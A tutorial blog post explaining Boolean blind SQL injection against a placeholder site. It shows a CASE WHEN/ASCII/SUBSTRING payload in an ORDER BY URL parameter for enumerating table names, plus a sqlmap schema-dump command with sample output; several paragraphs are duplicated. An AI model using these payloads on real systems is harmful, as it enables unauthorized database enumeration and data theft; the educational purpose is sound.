Types Of SQL Injection Attacks - Blind Based Attacks
Well here we are, the last blog of this series. The last type of SQL injection attack to cover is blind based injection attacks. There are two types of Blind Based injection attacks, Boolean and time based. Let us focus on the Boolean and if the reader finds themselves curious, they can follow the link below how time based attacks work:
https://app.pluralsight.com/library/courses/ethical-hacking-sql-injection
Let's revisit our favorite site:
http://www.site.com/table?column=x
Let's say this site has a table that allows users to order the columns. When navigating to this table, the address changes to:
http://www.site.com/table?order=column
This table contains two creatively named columns:
https://app.pluralsight.com/library/courses/ethical-hacking-sql-injection
Let's revisit our favorite site:
http://www.site.com/table?column=x
Let's say this site has a table that allows users to order the columns. When navigating to this table, the address changes to:
http://www.site.com/table?order=column
This table contains two creatively named columns:
- column
- column2
Utilizing our previous attacks (e.g. error and union based attacks) only returns a generic error. It seems our targeted web developers have become a little smarter and are starting to implement error handling for invalid queries. This still doesn't stop us from discovering tables and columns for ex-filtrating data. We can deduce that "order" likely means order by column asc in the sql query. We can inject some sql code here to ask the system some questions. However, how can we get the systems to respond with a yes or no?
Thankfully, SQL consists of flow control which includes IF and CASE expressions. We can assume the query behind the scenes looks like the following below with column getting replaced by the red injection string:
SELECT * FROM table ORDER BY Column
CASE WHEN (SELECT TOP 1 ASCII(SUBSTRING(name,1,1) FROM sys.tables))<=109
THEN column ELSE column2 END
What this query says is if the first letter of the table is m or letter before m , then order by column. If it is false, then the table will order by column2. This midpoint method can be used to find each letter of each table. The injection part can be placed in the address:
http://www.site.com/table?order=CASE WHEN (SELECT TOP 1 ASCII(SUBSTRING(name,1,1) FROM sys.tables))<=109 THEN column ELSE column2 END
The attacker then sits there for 5 days straight without food or drink and increments that substring start position until all letters in that single table have been discovered. Just kidding, this is were automation comes in. In the previous blog, I mentioned SQLMap. Lets take a look at what that may look like on a command line:
http://www.site.com/table?order=CASE WHEN (SELECT TOP 1 ASCII(SUBSTRING(name,1,1) FROM sys.tables))<=109 THEN column ELSE column2 END
The attacker then sits there for 5 days straight without food or drink and increments that substring start position until all letters in that single table have been discovered. Just kidding, this is were automation comes in. In the previous blog, I mentioned SQLMap. Lets take a look at what that may look like on a command line:
root@kali:~# sqlmap.py -u "http://www.site.com/table?order=column" --schema
What it returns, may be:
Database: <DatabaseName>
Table: table
[2 columns]
+-----------+-------+
| Column | Type |
+-----------+-------+
| Column | char |
| Column2 | int |
+-----------+-------+
Phew, thank you SQLMap. More information may be found below:
Hunt, T. (2015, May). Ethical Hacking: SQL Injection. Retrieved from https://app.pluralsight.com/library/courses/ethical-hacking-sql-injection
Comments
Post a Comment